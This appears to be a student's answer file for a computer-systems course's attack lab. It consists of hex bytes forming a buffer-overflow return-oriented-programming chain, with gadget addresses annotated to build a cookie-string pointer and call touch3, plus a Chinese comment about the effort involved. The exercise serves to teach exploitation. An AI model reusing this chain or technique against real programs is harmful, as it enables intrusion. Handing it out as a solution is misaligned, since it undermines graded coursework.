/* 哇，不知道有现成的相加函数能用，硬想了一个多小时是真的难受/(ㄒoㄒ)/~~ */

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 /* addr movq %rsp,%rax; addval_190 */
a2 19 40 00 00 00 00 00 /* addr movq %rax %rdi; addval_273 */
ab 19 40 00 00 00 00 00 /* addr popq %rax; addval_219 */
48 00 00 00 00 00 00 00 /* $72 */
dd 19 40 00 00 00 00 00 /* addr movl %eax,%edx; getval_481 */
69 1a 40 00 00 00 00 00 /* addr movl %edx,%ecx; getval_311 */
13 1a 40 00 00 00 00 00 /* addr movl %ecx,%esi; addval_436 */
d6 19 40 00 00 00 00 00 /* addr lea (%rdi,%rsi,1),%rax; add_xy */
a2 19 40 00 00 00 00 00 /* addr movq %rax %rdi; addval_273 */
fa 18 40 00 00 00 00 00 /* addr touch3 */
35 39 62 39 39 37 66 61 /* sval */
